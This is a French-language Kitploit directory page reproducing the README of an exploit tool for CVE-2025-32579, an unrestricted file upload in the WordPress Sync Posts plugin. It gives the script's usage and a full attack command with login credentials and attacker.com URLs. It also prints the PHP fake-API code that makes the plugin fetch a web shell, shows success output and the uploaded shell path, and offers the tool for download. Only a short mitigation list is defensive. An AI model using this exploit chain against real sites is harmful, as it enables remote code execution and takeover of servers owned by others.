Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/nxploited/cve-2025-32579
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubnxploited/cve-2025-32579

CVE-2025-32579

WordPress Sync Posts Plugin <= 1.0 est vulnérable à un téléchargement de fichier arbitraire

Voir le dépôt
11il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

⚠️ CVE-2025-32579 - RCE Critique via le Plugin Sync Posts (WordPress)

📦 Affecte : Sync Posts <= 1.0
🧨 Score CVSS : 9.9 CRITIQUE
📁 Vecteur CVSS : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H


🧠 Aperçu de la Vulnérabilité

Le plugin WordPress Sync Posts de SoftClever Limited est vulnérable à une vulnérabilité de téléchargement de fichier sans restriction qui permet à des attaquants authentifiés de télécharger et d'exécuter des fichiers PHP arbitraires (tels que des shells web) sur le serveur.

🔓 Cause Racine :

  • Le plugin accepte une website_url qui renvoie des posts JSON.
  • Il récupère aveuglément les images du contenu des posts sans validation.
  • Aucune restriction de type de fichier, de mime-type ou de chemin n'est appliquée.
  • Toutes les images (même les fichiers PHP) sont téléchargées et stockées dans wp-content/uploads.

🚨 Pourquoi c'est Dangereux

  • ✅ Exécution de Code à Distance (RCE)
  • ✅ Télécharge des shells web directement sur le serveur
  • ✅ Nécessite des privilèges minimaux (utilisateur authentifié uniquement)

⚙️ Description du Script (Exploit)

Le script d'exploitation automatise la chaîne complète :

  1. 📥 Se connecte à WordPress avec les identifiants fournis
  2. 🧠 Génère une fausse API PHP renvoyant un post JSON avec un shell en tant que <img src="https://raw.githubusercontent.com/nxploited/cve-2025-32579/HEAD/...">
  3. 📡 Envoie une website_url malveillante à admin-ajax.php?action=sync_posts
  4. 💣 Force le plugin à récupérer et enregistrer le shell dans /uploads/
  5. ✅ Pas besoin de Referer ou de nonce — le cookie de session suffit

root@kitploit:~
usage: CVE-2025-32579.py [-h] -u URL -un USERNAME -p PASSWORD -ws WEBSITE -shell WEBSHELL

Exploit For CVE-2025-32579 Sync Posts # By: Nxploited ( Khaled Alenazi )

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL (e.g., http://target.com/wordpress)
  -un, --username USERNAME
                        Username to login
  -p, --password PASSWORD
                        Password to login
  -ws, --website WEBSITE
                        URL to fake API (e.g., http://attacker.com/Khaled_alenazi.php)
  -shell, --webshell WEBSHELL
                        Web shell URL used inside the fake API (can be a test image)
                                                                                       

💻 Instructions d'Utilisation

📌 Format de la Commande :

root@kitploit:~
python3 CVE-2025-32579.py -u http://target/wordpress -un admin -p pass123 -ws http://attacker.com/Khaled_alenazi.php -shell http://attacker.com/shell.php

⚙️ Arguments :

DrapeauDescription
-u, --urlURL WordPress cible
-un, --usernameNom d'utilisateur WordPress (admin)
-p, --passwordMot de passe WordPress
-ws, --websiteURL du fichier PHP malveillant renvoyant un faux JSON de post
-shell, --webshellLe fichier shell réel à injecter via ``

Vous pouvez également utiliser une image fictive au lieu d'un vrai shell pour les tests :

root@kitploit:~
--webshell https://via.placeholder.com/1x1.jpg

🧪 Exemple de Sortie de Fausse API

Voici la réponse renvoyée par Khaled_alenazi.php :

root@kitploit:~
<?php
header('Content-Type: application/json');
echo json_encode([
  [
    "id" => 1,
    "title" => ["rendered" => "Nxploited"],
    "content" => [
      "rendered" => "<img src="http://attacker.com/shell.php">"
    ]
  ]
]);
?>

✅ Exploit Réussi :

root@kitploit:~
[*] Attempting login...
[+] Logged in successfully.
[+] Generated fake API PHP file: Khaled_alenazi.php
[+] Sending exploit request to: http://target.com/wordpress
[+] Request sent successfully.
{
  "success": true,
  "data": {
    "message": "Posts imported successfully",
    ...
  }
}

🔥 Après une exploitation réussie :

  • Chemin et nom du shell : shell.php
  • target.com/wp-content/uploads/2025/04/shell.php

🛠️ Correctif / Atténuation

  • Restreindre l'accès à website_url aux domaines internes ou aux hôtes autorisés
  • Valider les extensions d'image et les types de contenu
  • Éviter d'analyser du JSON tiers sans nettoyage

🧷 Référence

CVE: CVE-2025-32579
Exploit par Nxploited (Khaled Alenazi)


Télécharger l’outil